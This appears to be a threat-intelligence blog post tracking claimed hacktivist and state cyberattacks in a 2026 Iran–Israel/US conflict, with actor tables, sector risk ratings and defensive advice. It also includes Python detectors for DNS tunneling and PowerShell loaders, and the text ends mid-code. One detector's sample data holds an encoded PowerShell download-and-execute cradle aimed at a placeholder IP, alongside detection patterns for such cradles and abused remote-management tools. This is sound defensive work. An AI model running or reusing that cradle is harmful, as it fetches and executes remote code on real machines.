SOCRadar® Cyber Intelligence Inc. | Iran vs. Israel & US Cyber War 2026: Operation Epic Fury Threat Intelligence
Mar 09, 2026
Apr 09, 2026
Moon

Iran vs. Israel & US Cyber War 2026: Operation Epic Fury Threat Intelligence

On February 28, 2026, the US and Israel launched Operation Epic Fury, striking Iran’s military command, missile infrastructure, and senior leadership. Khamenei, the Defense Minister, the IRGC commander, and the army chief of staff were all reported killed within hours.

SOCRadar's live Iran-Israel Cyber War Dashboard tracks the cyber dimensions of Operation Epic Fury in real time.

Iran retaliated by hitting 27 US bases across the region, plus Israel, with notable strikes on Bahrain’s 5th Fleet HQ, Kuwait’s airport, and attempted strikes on Riyadh. Gulf states caught in the crossfire saw a Shahed drone hit Dubai’s Fairmont Hotel, Abu Dhabi’s airport struck with casualties, and air defenses engaged over Doha. Airports closed, and financial capitals went into shelter mode.

Inside Iran, a parallel cyberattack drove internet connectivity to 4% of normal. Government sites went dark, state outlet IRNA went offline, and IRGC-linked Tasnim was hacked and reportedly displayed anti-Khamenei messages. The blackout appeared designed not just to isolate Iranians from the outside world, but to sever the leadership from its own command structure.

With its conventional military badly degraded, cyber operations may be Iran’s only remaining tool for retaliation in the coming days.

Timeline of Cyber Attacks in the Iran-Israel Conflict

Below are the daily highlights, followed by the threat intelligence sections:

March 25, 2026 | Handala Targets Former Mossad Chief, BD Anonymous Hits Interpol, and Keymous Returns to Egypt

March 25 (Day 26 of the conflict) opened with Handala’s most personally targeted operation since the conflict began. While DDoS campaigns continued across Egypt and international organizations, the day’s defining moment was a hack-and-leak post naming a former intelligence chief and claiming 14 gigabytes of documents to back the claim.

March 24, 2026 | Alliance Fractures, Bounties, and a Kurdish Front Opens

Our Week 3 Threat Assessment Report is now available. Check it for a summary of both weeks’ developments.

On March 24, Cyb3r Drag0nz Kurdish formally broke from the Cyber Islamic Resistance coalition, publishing the names and photographs of six Peshmerga fighters killed in Iranian strikes and calling on the Kurdish diaspora to stand against Iran. The same day, Iran-aligned Fynix announced attacks on Kurdish governments and organizations in direct response, opening a new sub-front between pro-Iranian actors and Kurdish groups. Handala posted a $50 million bounty on Trump and Netanyahu in response to the DOJ’s own $10 million bounty on Handala members. Cyber Fattah issued a formal entry statement signaling a pre-operational reconnaissance phase.

March 23, 2026 | Handala Publishes Power Grid Maps, NoName Reaches Denmark, and DieNet Tests Google

On March 23, Handala published nine schematic maps of Israeli power plant and electrical grid infrastructure on its website. NoName057(16) opened a new front in Denmark and Greenland under #OpDenmark, targeting Air Greenland and Nuuk’s public transport system around the announcement of early Danish elections. Conquerors Electronic Army hit an Israeli business directory, and DieNet claimed to have bypassed Google’s hosting protection on the Lamborghini website, framing it as proof that no hosting infrastructure is immune.

March 22, 2026 | Keymous Reaches Egypt, a New Channel Geolocates Hotels, and the Lockheed Claim Gets a PoC

On March 22, Keymous Plus extended #Op_Epstein_Gulf to Egypt, claiming verified DDoS across six government targets including the Cabinet, Ministry of Interior, and Ministry of Petroleum. A newly surfaced channel called Harvesting Time published satellite imagery geolocating the King David Hotel in Jerusalem and the Erbil Rotana Hotel in Iraqi Kurdistan with no breach claim attached. Cyber Fattah forwarded an alleged Proof of Concept for APT IRAN’s Lockheed Martin breach claim, including dark web contact details and IOC strings. The claim remains unverified.

March 21, 2026 | NoName Sweeps Romania Again, DieNet Claims 100 Attacks in a Day

On March 21, NoName057(16) returned to Romania with two separate waves of verified DDoS, hitting MOL Romania, Romanian Railways Authority, Bucharest Metro, the Chamber of Deputies, both Supreme Courts, and a state rail construction plant under #OpRomania and #TimeOfRetribution. DieNet reported more than 100 attacks against 50+ Israeli websites in a single day under #CanYouResist, with El Al, the IDF portal, Rafael, and Israeli ISPs among confirmed targets. RuskiNet republished a 2025 Bank of Jerusalem data leak, framing the re-release as a visibility operation for those who missed the original.

March 20, 2026 | Eid, Nowruz, and a Quiet Day With a Loud Claim

On March 20, hacktivist activity dropped sharply as Eid al-Fitr and Nowruz coincided for the first time in years, silencing most of the coalition’s daily operational tempo. APT IRAN used the quiet to publish a screenshot of an alleged water treatment HMI panel in Fenton, Missouri, claiming access to a Kupferle Water Solutions control system dated March 10. The same day, APT IRAN circulated an unverified claim of a 375TB Lockheed Martin breach, offering the alleged data for sale via ThreatMarket. No verified evidence was published.

March 19, 2026 | FBI Seizes Handala’s Domain, 313 Team Downs the Internet Archive, and the Coalition Keeps Expanding

On March 19, the FBI seized handala-redwanted.to under a federal warrant, citing use of the domain to support malicious cyber activities on behalf of a foreign state actor. Handala’s nameservers were redirected to FBI infrastructure, the group migrated to a new domain, and its Telegram activity continued uninterrupted. 313 Team took down the Internet Archive with a verified ongoing DDoS, targeting civilian digital infrastructure with no connection to the conflict. BD Anonymous returned to South Korea, claiming the Ministry of National Defence website under #OpSouthKorea. Conquerors Electronic Army hit an Israeli business directory under the CIR umbrella, and a Malaysia-based group announced #OpsShadowStrike targeting Israel-allied countries after Eid.

March 18, 2026 | Larijani Killed, Iran Retaliates, and 8.3 Million Israeli Voter Records Leaked

On March 18, Israel confirmed the killing of Ali Larijani, secretary of Iran’s Supreme National Security Council and the highest-ranking official eliminated since Khamenei’s assassination on February 28, alongside Basij commander Gholamreza Soleimani and the IRGC’s Aerospace Force chief. Iran retaliated with missile strikes on Israeli targets. On the cyber front, NoName057(16) swept six Israeli insurance and defense-technology targets under #OpIsrael with verified downtime, INDOHAXSEC published an alleged 8.3 million Israeli voter records sourced from general election data, Cyber Islamic Resistance claimed server access at Israeli firm Logit E.D, and APT IRAN warned Iranian Starlink users that their devices were being tracked by Israeli intelligence while threatening to expose VPN sellers operating inside Iran.

March 17, 2026 | Microsoft, South Korea, and the Israeli Lawyers Database

Our Week 2 Threat Assessment Report is now available. Check it for a summary of both weeks’ developments.

On March 17, 313 Team, Anti-Zionist Cyber Group, and Keymous Plus all claimed to target Microsoft 365, Outlook, and Copilot with DDoS disruption. Keymous Plus extended #Op_Epstein_Gulf to Telecom Egypt, its first North African target. Hider_Nex attacked 15+ South Korean government domains under #OpSouthKorea, including the Ministry of Defence and National Intelligence Service. NetStrike resurfaced with a claimed 29,300-record Israeli lawyers database under #OpIsrael. Unverified.

March 14–16, 2026 | Targeting Intelligence, Telecom Strikes, and the Counter-Offensive Takes Shape

On March 14, Keymous Plus swept eight Syrian government domains under #Op_Epstein_Gulf, Mad Ghost claimed an attack on Israeli 4G core infrastructure with verified IP addresses and protocol details, and Anonymous Syria Hackers dropped a 3.2GB leak from an Iranian Khamenei-linked educational institution under #Op_Iran, exposing staff identity records and national ID numbers.

On March 15, Golden Falcon published satellite imagery of a labeled Israeli military satellite site with precise coordinates, no breach claim attached. Pure targeting intelligence, shared across Telegram to tens of thousands of followers. By March 16, the mass DDoS sweep era was giving way to more deliberate, intelligence-driven operations as the conflict entered its third week. Iran’s internet blackout stood at sixteen consecutive days, with connectivity still below 1% of pre-conflict levels.

March 13, 2026 | Cyber Islamic Resistance Breaches Israeli Security Firm, 313 Team Hits UAE, NoName Stays Locked on Cyprus

On March 13, Cyber Islamic Resistance claimed a breach of MEGINIM DATA SERVICES, an Israeli cybersecurity company, publishing three batches of alleged exfiltrated data in a symbolic escalation targeting Israel’s defensive cyber sector. 313 Team turned its focus to the UAE, hitting 20 government domains across Abu Dhabi and Dubai in a single coordinated operation. NoName057(16) returned to Cyprus for the third consecutive day under #OpCyprus, adding municipal portals, media outlets, and utility infrastructure to its target list while calling out geo-based restrictions as failed evasion attempts. INDOHAXSEC claimed a data breach against Israeli e-commerce platform P1000, publishing only 2 customer records, including identity numbers and credentials.

March 12, 2026 | Handala’s Wiper Hits Stryker, Keymous Floods Six Arab Countries, Romania Drawn Into Conflict

On March 12, Handala claimed a wiper attack against medical technology giant Stryker, allegedly abusing Microsoft Intune to remotely wipe over 200,000 devices across 79 countries, sending home 5,000+ workers in Ireland. Keymous Plus swept six Arab countries under #Op_Epstein_Gulf with 50+ verified DDoS claims hitting nearly every major government ministry across Syria, Jordan, Qatar, Bahrain, Kuwait, and the UAE. 313 Team shut down Romania’s National Tax Agency for one hour in retaliation for the Romanian president’s statements on US military base access, marking the first confirmed European government target of the conflict.

March 11, 2026 | Hider_Nex Sweeps Kuwait, New Alliances, and NetStrike’s One-Day Story

On March 11, Hider_Nex, a newly emerged Tunisian group, declared an alliance with NoName057(16) and immediately launched DDoS claims against 18 Kuwaiti government domains in a single operation, hitting defense, health, finance, and civil infrastructure. Moroccon Black Cyber Army claimed disruption of Israeli Discount Bank under #OpIsrael, with limited but verified impact. NetStrike completed its full lifecycle in one day: channel created, alliance formed with Keymous+, DDoS claimed against an Israeli radio station, then silence.

March 10, 2026 | FSociety’s 42-Hour Deadline, NoName Hits Water and Telecom

On March 10, Team Fearless hit Alon Israel Oil Company, defense firm Goldtec Technologies, and Amarel Ltd. under #OpIsrael, mixing energy, defense, and commercial targets in one campaign. NoName057(16) claimed disruption of Bezeq, Mekorot, Kavim, and UAV maker E.M.I.T. Aviation in a single post, then separately extended its #OpCyprus campaign to the national electricity authority, airport transfers, and public transit systems. FSociety issued a 42-hour threat against Israel and the US, calling for mass mobilization, with no technical activity confirmed yet.

March 7–9, 2026 | New Supreme Leader, Wider Targets, OT Claims Surge

Our Week 1 Threat Assessment Report is now available. Check it for a summary of last week’s developments.

From March 7 to 9, 368 cyber incidents were tracked across a dozen countries, with Israel absorbing half of them. OT and ICS claims intensified, with groups asserting control over hotels, water systems, banks, and universities. Geographic targeting expanded to Cyprus, the UK, and Saudi Arabia, while the election of a new Supreme Leader under IRGC influence signaled more state-directed operations ahead.

March 6, 2026 | MuddyWater’s Pre-Planted Backdoors and Kuwait’s Worst Day

On March 6, reporting surfaced that MuddyWater had already planted backdoors inside a US bank, an airport, and defense-adjacent firms before the conflict began. On the hacktivist side, 313 Team launched the most coordinated single-group assault of the conflict, targeting 26 Kuwaiti government domains, including defense, health, and civil infrastructure. DieNet struck nine Qatari government sites, framing it as retaliation for media censorship.

March 5, 2026 | The Front Goes Global, Data Leaks on Both Sides

On March 5, pro-Iranian and Russian-aligned groups ran parallel DDoS, leak, and infrastructure probe campaigns across the US, Israel, and the Gulf, with India and Pakistan now appearing on the target map. Keymous claimed 300,000+ records from Israel’s Ministry of Education internal portal. A new group, Cyber Jihad Movement, announced entry into the conflict with stated ties to Taliban-aligned actors.

March 4, 2026 | OT Claims Escalate, Grain Storage and Water Systems Targeted

On March 4, APT Iran claimed a month-long intrusion into Jordan’s grain storage systems, allegedly manipulating temperatures and underreporting wheat weights. Z-Pentest Alliance published screenshots of an Israeli water pump HMI, claiming real-time control over valves and alarms. DieNet expanded into Jordanian civilian infrastructure, claiming access to employee payroll and ID data from the electricity distribution company.

March 3, 2026 | Russia Joins the Coalition, Gulf States Under Pressure

On March 3, pro-Russian hacktivist clusters formally joined the pro-Iran coalition, dividing focus between Europe and the Middle East. Gulf states faced widening DDoS campaigns across government ministries and airports. Large-scale OT claims surfaced, though most lacked technical verification and appeared primarily narrative-driven.

March 2, 2026 | Critical Infrastructure Targeted, Ransomware Enters the Picture

On March 2, multiple actors escalated toward critical infrastructure, with ICS and PLC screenshots shared as alleged proof of access to energy systems. DieNet published structured target lists spanning Qatar, Bahrain, the UAE, Kuwait, and Saudi Arabia. An Israeli company appeared on the INC Ransomware disclosure blog with roughly 1TB of alleged exfiltrated data.

March 1, 2026 | Hacktivist Coalitions Form, Gulf Governments First in Line

On March 1, Cyber Islamic Resistance launched a joint Electronic Operations Room, consolidating several hacktivist groups under a single operational banner. Gulf governments, particularly Jordan and Kuwait, became the primary targets with DDoS as the dominant method. Activity began expanding toward Israeli and US entities, with early reconnaissance and doxxing posts signaling what was coming.

U.S. & Israeli Cyber Operations During Operation Epic Fury

The operation was not purely kinetic. From the first strike, cyber operations ran in parallel, designed to blind and isolate the Iranian command before bombs landed.

As fighter jets and cruise missiles struck IRGC command centers, a parallel front paralyzed the Islamic Republic from within. Israeli sources claimed it as “the largest cyberattack in history.” Critical infrastructure, official news sites, and security communications stopped functioning, leaving leadership in the dark at home and abroad. Western intelligence sources confirmed that the damage to the IRGC’s communications infrastructure was deliberate. The goal was to prevent counterattack coordination and disrupt drone and ballistic missile launch capabilities.

This was not improvised. The operation was the peak of a campaign that began in January, when government satellite broadcasts were hacked and content calling for the regime’s overthrow was aired to millions of Iranian households. On February 28, that groundwork culminated in a combined electronic warfare and DDoS assault that took IRNA offline and hacked Tasnim, the IRGC-affiliated outlet, to display anti-Khamenei messages directly on its own platform.

Received images from multiple citizens show the hacking of the Saba Wind Azan and Prayer Times app. The app reportedly displayed political messages instead of its regular prayer time notifications. The messages included statements such as: “Help has arrived,” “Do not fear, defend them, and they will defend you.” (@Vahid)

Space-based intelligence, electronic warfare aircraft, and cyber support elements likely degraded radar coverage, air defense coordination, and facility communications during the opening phase. This is consistent with US-Israeli joint doctrine: suppress the enemy’s ability to see, communicate, and respond before the first bomb lands. With connectivity confirmed at 4% of normal levels, Iran went dark precisely when its leadership needed communications most.

Iran’s Cyber Capabilities and Threat Actors

Iran treats cyber operations as a core instrument of national power. Over the past decade, Tehran has institutionalized offensive cyber activity through units linked to the Islamic Revolutionary Guard Corps and the Ministry of Intelligence. Iranian operators blend espionage, disruption, data theft, wiper attacks, and influence campaigns. They favor asymmetric targeting. They focus on critical infrastructure, defense contractors, telecom providers, and political networks across the US, Israel, and the Gulf.

Key Iranian APT Groups

Security researchers track multiple active Iranian threat clusters. These groups vary in technical profile, persistence, and strategic focus, but all align with Tehran’s geopolitical goals:

| Group | Also Known As | Primary Targets | Tactics | Recent Activity Pattern |
|---|---|---|---|---|
| APT33 | Elfin, Refined Kitten, Magnallium, HOLMIUM | Aerospace, energy, defense | Spear phishing, custom malware, wipers | Continued targeting of US and Gulf energy and industrial firms |
| APT34 | OilRig, Helix Kitten, Cobalt Gypsy, Hazel Sandstorm | Middle East government, telecom, finance | Credential harvesting, DNS tunneling and hijacking, custom backdoors | Long-term regional espionage with sustained persistence |
| APT35 | Charming Kitten, Phosphorus, TA453, Mint Sandstorm | Journalists, academics, policy experts | Social engineering, credential theft, surveillance | Cloud credential harvesting and policy-focused espionage |
| APT39 | Chafer, Remix Kitten (Remexi is its backdoor) | Telecom, travel, IT providers | Data exfiltration, surveillance tooling | Telecom-focused intelligence collection across the region |
| APT42 | TA453, Mint Sandstorm | NGOs, civil society, healthcare, academia | Spear phishing, impersonation, cloud credential harvesting | Expanded espionage campaigns targeting civil society and think tanks |
| MuddyWater | Static Kitten, Seedworm, TEMP.Zagros, Mercury, Mango Sandstorm | Government, transport, industrial | Phishing, PowerShell loaders, lateral movement | Increased targeting of infrastructure and regional governments |
| Tortoiseshell | Imperial Kitten | Defense contractors, supply chain | Fake recruitment portals, watering hole attacks | Supply-chain-themed credential harvesting campaigns |
| Cyber Av3ngers | Cyber Avengers | Water utilities, ICS/OT systems | OT device defacement, PLC exploitation | Targeting exposed industrial control systems, including water infrastructure |
| Fox Kitten | UNC757 | VPN appliances, edge devices | Exploiting unpatched perimeter systems | Targeting enterprise edge infrastructure for initial access |

Pro-Iran Hacktivist and Proxy Actors – Retrospective

During the June 2025 escalation, hacktivist activity surged in parallel with state cyber operations. SOCRadar recorded more than 600 distinct cyberattack claims across over 100 Telegram channels within 15 days.

Daily claims peaked shortly after major kinetic strikes, showing a clear link between battlefield events and online activity. Most operations consisted of DDoS attacks, followed by data leaks, defacements, doxxing, broadcast hijacks, and limited operational technology disruption.

Israel accounted for the majority of claims, while the United States and several Gulf states also faced repeated targeting. Telegram served as the primary coordination and amplification platform. Channels published screenshots, breach claims, and alleged proof of disruption. Many claims were exaggerated or duplicated, but the sustained volume created psychological pressure and media amplification.

Hacktivist Activity Snapshot in June 2025, Twelve-Day War

| Metric | Observation |
|---|---|
| Distinct attack claims | 600+ |
| Active Telegram channels | 100+ |
| Peak daily claims | 80+ in a single day |
| Primary attack type | DDoS (majority share) |
| Secondary attack types | Data leaks, defacements, doxxing, broadcast hijacks |
| Most targeted country | Israel (70%+ of claims) |
| Secondary targets | United States, Jordan, Saudi Arabia, UAE |
| Coordination platforms | Telegram, Twitter (X) |
| Most active group | Mr Hamza |

The last conflict demonstrated that hacktivism did not operate in isolation. It amplified state objectives, expanded the attack surface, and complicated attribution. In the current escalation, similar waves of DDoS activity, leak campaigns, and coordinated influence operations should be expected; many are already in progress.

Hacktivist Activity in the Iran–Israel Cyber War

The ecosystem included ideologically aligned regional collectives, opportunistic actors seeking visibility, and propaganda driven groups linked to broader strategic narratives. Attribution often remained ambiguous by design. Branding shifted. Group names changed. Channels reappeared under new identities. The operational behavior, however, follows a consistent pattern. Below are the key details:

Pro-Iran Hacktivist Groups — 70+ Groups

#OpIsrael, 313 Team, 404 Crew Cyber Team, 4 Exploitation Team, Al_Safwa313, Al Toufan Team, Akatsuki Cyber Team, Anonymous Sana’a, Anti-Zionist Cyber Group, APT Iran, Azrael — Angel of Death, BD Anonymous, Black Ember, Black Swamp, Black Vortex, Conquerors Electronic Army, Coup Team, Cyb3r Drag0nz, Cyber 4vengers, Cyber32, Cyber Fatah Team, Cyber Islamic Resistance, Cyber Isnaad Front, DarkStorm Team, DieNet, Evil Markhors, FAD Team, Fatimon Cyber Team, Fsociety 1377, Fynix, Garuda Eye, Gaza Children’s Group, Golden Falcon, Handala Hack, Hand of Justice, HaxChipper, Hider_Nex, INDOHAXSEC, Iran Anonymous, Jangir, Keymous Plus, Liwaa Mohammad, LulzSec Black, MAD GHOST, Mokhberir Team, Moroccon Black Cyber Army, Nafir (نفير), Nation of Saviors, NetStrike, NoName057(16), NOS Islamic Division, PS 1948, Reptor, Resistance Toast, RipperSec, RuskiNet Group, Russian Legion, ServerKillers, Shadow33, Stuxc Team, Sylhet Gang-SG, Systemadminbd, Tharallah Brigade, UniT 313, Vulture, Yemen Cyber Army, Z-Pentest Alliance

Pro-Israel / Allied — 11 Groups

AltroX Official, Anonymous OpIran, Anonymous Syria Hackers, Anonymous Zeuz, Cyber Soldier, Digit_4, Fastattack877, LabDookhtegan, Legion, Troll Team, Youranon_storm

Industries at Risk from Iranian Cyber Attacks

| Sector | Risk Level | Primary Actor Types | Notes |
|---|---|---|---|
| Government / Public Administration | Critical | Hacktivist (all clusters) | Highest volume across all countries. Every declared target country has faced government portal disruption. |
| Energy & Oil Infrastructure | Critical | APT33, CyberAv3ngers, OilRig, hacktivists | Parallel to kinetic strikes on Ras Tanura, QatarEnergy LNG, Port of Salalah. Strait of Hormuz closure pushed Brent crude above $82. |
| Financial Services | Critical | Hydro Kitten (CrowdStrike), DarkStorm, NoName057(16) | Hydro Kitten explicitly signalled financial sector intent. DarkStorm moved against Israeli banks on Day 3. Historical precedent: Operation Ababil (300+ DDoS attacks, 50 US banks, 2012–2013). |
| Water & Food Supply | Critical | Handala, APT Iran, Z-Pentest Alliance | OT claims against Israeli water pump HMI and Jordan grain silos appeared within 96 hours, unusually early in an escalation cycle. |
| Telecommunications & ISPs | High | APT34, APT39, hacktivists | Dual purpose: service disruption and intelligence collection for dissident identification. Compromised ISP data directly affects the physical safety of individuals in the dataset. |
| Aviation & Airports | High | DieNet, multiple hacktivists | Parallel to kinetic strikes on Kuwait Airport, Dubai Airport, Abu Dhabi, and Bahrain. DieNet’s target lists include airport operational systems across all Gulf states. |
| Defense Industrial Base | High | Handala, NoName057(16) | Elbit Systems claimed by NoName057(16). Israeli security firms in Handala SCADA access claims. Symbolic value plus intelligence collection on weapons and supply chains. |
| Healthcare | High | Handala, Conquerors Electronic Army | Visible civilian impact; significant personal data for secondary operations. Israeli hospital systems have been explicitly targeted by Handala historically. |
| Media & Communications | High | Handala, state-linked actors | i24 News in Handala claims. IRNA and Tasnim hacked in the Allied opening-day cyber operation. Information environment control is a consistent objective. |
| Cloud Infrastructure | High | State-linked actors, kinetic strikes | AWS UAE facilities struck kinetically on March 1. First confirmed kinetic attack on hyperscale cloud infrastructure during active conflict. Multi-region architecture is now a resilience requirement. |
| NGOs, Civil Society, Academia | Medium-High | APT42, Educated Manticore | APT42 specifically targets Western and Middle Eastern NGOs, media, academic institutions. Geography is now a risk factor independent of mission. |
| Maritime & Shipping | Medium-High | State-linked actors, kinetic strikes | Strait of Hormuz closure; Port of Salalah and Duqm Port struck. Hacktivist actor lists include port and shipping infrastructure across Gulf states. |

Recommendations

State Entities, Government Agencies & Critical Infrastructure Operators

Governments and infrastructure operators in Israel, the US, Gulf states, and any country perceived as aligned with Operation Epic Fury are priority targets for both Iranian APTs and hacktivist collectives. Action is required now, not after an incident.

Access & Identity

  • Enforce MFA on all government and infrastructure accounts without exception
  • Audit and immediately revoke unnecessary remote access privileges
  • Remove any unmanaged RMM tools from government networks; MuddyWater actively abuses legitimate remote management software for persistence
  • Rotate credentials for all privileged accounts and cloud administrator roles

Network & Perimeter

  • Patch all internet-facing devices, VPN appliances, and edge infrastructure immediately; Fox Kitten specializes in unpatched perimeter exploitation
  • Review DNS query logs for anomalous patterns; OilRig has used DNS tunneling for command-and-control and exfiltration, which shows up as long, high-entropy subdomains and unusual record types under a single domain
  • Activate or validate DDoS mitigation capacity on all public-facing portals; government domains in Jordan, Kuwait, and Israel are already being targeted
  • Segment and isolate all ICS and OT environments; CyberAv3ngers has disrupted industrial control systems with minimal technical capability, largely by reaching internet-exposed PLCs that still use default credentials
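The DNS log review above is easier to operationalise with a concrete heuristic. The following is an added example written for this article, not SOCRadar's tooling: it scores DNS query logs per client and registered domain for the signatures of tunneling (long, high-entropy leftmost labels, a unique subdomain on nearly every query, and TXT/NULL record types that can carry data back to the client). The log format, thresholds, and the `bad-domain.net` name are assumptions, and the sample lines are constructed.

```python
"""Heuristic detection of DNS tunneling in query logs (added example)."""
import math
from collections import defaultdict

# Constructed sample log lines (not real telemetry): "<client> <qname> <qtype>"
SAMPLE_LOG = """\
10.0.0.5 www.example.com A
10.0.0.5 mail.example.com MX
10.0.0.5 cdn.example.com A
10.0.0.5 api.example.com A
10.0.0.7 a3f9e1c2b7d04e6f8a1b2c3d4e5f6071.tun.bad-domain.net TXT
10.0.0.7 5b8c2d9e0f1a2b3c4d5e6f7081920a3b.tun.bad-domain.net TXT
10.0.0.7 9e0f1a2b3c4d5e6f708192a3b4c5d6e7.tun.bad-domain.net TXT
10.0.0.7 1a2b3c4d5e6f708192a3b4c5d6e7f809.tun.bad-domain.net TXT
10.0.0.7 c4d5e6f708192a3b4c5d6e7f8091a2b3.tun.bad-domain.net TXT
10.0.0.7 www.example.com A
"""

# Thresholds are assumptions; tune them against the local baseline.
MIN_QUERIES = 4          # ignore buckets too small to judge
MAX_LABEL_LEN = 20       # ordinary hostnames are far shorter than encoded chunks
MAX_ENTROPY = 3.0        # bits/char; random hex is ~4, English words ~2-3
MAX_UNIQUE_RATIO = 0.8   # tunnels use a fresh subdomain per query to defeat caching
DATA_QTYPES = {"TXT", "NULL"}


def shannon_entropy(text):
    """Shannon entropy in bits per character of a string."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    """Last two labels. Assumption: no public-suffix list available offline."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_line(line):
    client, qname, qtype = line.split()
    return client, qname.lower().rstrip("."), qtype.upper()


def score_dns_log(log_text):
    """Return {(client, domain): stats} for every bucket with enough queries."""
    buckets = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            client, qname, qtype = parse_line(line)
            buckets[(client, registered_domain(qname))].append((qname, qtype))

    findings = {}
    for (client, domain), queries in buckets.items():
        if len(queries) < MIN_QUERIES:
            continue
        subdomains, entropies, lengths, data_hits = set(), [], [], 0
        for qname, qtype in queries:
            sub = qname[: -len(domain) - 1] if qname != domain else ""
            leftmost = sub.split(".")[0]          # the label that carries encoded data
            subdomains.add(sub)
            lengths.append(len(leftmost))
            entropies.append(shannon_entropy(leftmost))
            data_hits += qtype in DATA_QTYPES
        stats = {
            "queries": len(queries),
            "unique_ratio": len(subdomains) / len(queries),
            "avg_label_len": sum(lengths) / len(lengths),
            "avg_entropy": sum(entropies) / len(entropies),
            "data_qtype_ratio": data_hits / len(queries),
        }
        # Require the three structural signals together; the qtype ratio is
        # reported as supporting evidence rather than used as a gate.
        stats["suspicious"] = (
            stats["avg_label_len"] > MAX_LABEL_LEN
            and stats["avg_entropy"] > MAX_ENTROPY
            and stats["unique_ratio"] > MAX_UNIQUE_RATIO
        )
        findings[(client, domain)] = stats
    return findings


if __name__ == "__main__":
    for (client, domain), stats in score_dns_log(SAMPLE_LOG).items():
        flag = "SUSPICIOUS" if stats["suspicious"] else "ok"
        print(f"{client:10} {domain:20} {flag:10} {stats}")
```

In the sample, the `10.0.0.7` bucket under `bad-domain.net` is flagged (32-character hex labels, every query unique, all TXT), while the same client's ordinary `www.example.com` lookup is left alone. In production, feed the scorer from the resolver's query log in hourly windows and baseline the thresholds against known-good CDN and anti-virus domains, which also use long subdomains but at much lower entropy.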

Detection & Response

  • Deploy detection rules covering PowerShell-based loaders, RMM abuse, and spearphishing TTPs consistent with MuddyWater and OilRig
  • Establish a clear internal protocol for responding to Telegram breach claims before they generate press coverage; Iran’s information operations are designed to force a public response on the attacker’s timeline
  • Review and test incident response plans now; do not wait for an active incident to discover gaps
  • Brief senior leadership on the information operations dimension; fabricated breach claims and leaked documents are part of the playbook
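As an added example (not SOCRadar's detection content), the rules below score process-creation events for the PowerShell loader and RMM-abuse patterns named in the first bullet. Event fields mirror Sysmon Event ID 1; the weights, alert threshold, RMM binary names, and approved install paths are assumptions to tune per environment, and the sample events are constructed. The encoded-command handling matters because `-EncodedCommand` payloads are base64 of UTF-16LE text, so string matching on the raw command line alone misses the download cradle inside.

```python
"""Scoring process-creation events for PowerShell loaders and RMM abuse (added example)."""
import base64
import re

ALERT_THRESHOLD = 4  # assumption: sum of rule weights at which an event becomes an alert
ENCODED_RE = re.compile(r"(?i)(?<!\S)-e[a-z]*\s+([A-Za-z0-9+/=]{20,})")
HIDDEN_RE = re.compile(r"(?i)(?<!\S)-w(?:indowstyle)?\s+hidden")
CRADLE_RE = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-webrequest|invoke-expression"
    r"|net\.webclient|(?<!\w)(?:iwr|iex)(?!\w)"
)
# Remote-management agents publicly reported as abused by MuddyWater; a starting
# point only, not an allow/deny list for any real environment.
RMM_BINARIES = {
    "screenconnect.clientservice.exe", "screenconnect.windowsclient.exe",
    "atera.agent.exe", "syncro.service.exe", "remoteutilities.exe", "simplehelp.exe",
}
APPROVED_RMM_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"}


def decode_encoded_command(command_line):
    """Return the UTF-16LE plaintext of a -EncodedCommand payload, or '' if none."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except (ValueError, UnicodeDecodeError):
        return ""


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Score one event; returns (score, [names of rules that fired])."""
    image = basename(event["image"])
    parent = basename(event.get("parent_image", ""))
    cmd = event.get("command_line", "")
    hits = []
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded:
            hits.append(("ps_encoded_command", 3))
        if HIDDEN_RE.search(cmd):
            hits.append(("ps_hidden_window", 1))
        # Check both the raw line and the decoded payload for a download cradle.
        if CRADLE_RE.search(cmd) or CRADLE_RE.search(decoded):
            hits.append(("ps_download_cradle", 3))
        if parent in OFFICE_PARENTS:
            hits.append(("ps_spawned_by_office", 3))
    if image in RMM_BINARIES:
        path = event["image"].lower()
        if path.startswith(USER_WRITABLE):
            hits.append(("rmm_from_user_writable_path", 4))
        elif not path.startswith(APPROVED_RMM_DIRS):
            hits.append(("rmm_from_unexpected_path", 2))
        if parent in SCRIPT_HOSTS:
            hits.append(("rmm_spawned_by_script_host", 2))
    return sum(w for _, w in hits), [name for name, _ in hits]


def triage(events):
    """Return the events whose score reaches ALERT_THRESHOLD, with reasons."""
    alerts = []
    for ev in events:
        score, reasons = evaluate(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append({"host": ev["host"], "image": ev["image"],
                           "score": score, "reasons": reasons})
    return alerts


def _encoded(ps_script):
    """Build a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(ps_script.encode("utf-16le")).decode()


# Constructed sample events (not real telemetry), shaped like Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"host": "ws02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "powershell.exe -w hidden -nop -enc "
                     + _encoded("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')")},
    {"host": "ws03", "image": r"C:\Users\bob\AppData\Local\Temp\ScreenConnect.ClientService.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "ScreenConnect.ClientService.exe"},
    {"host": "srv01", "image": r"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.ClientService.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
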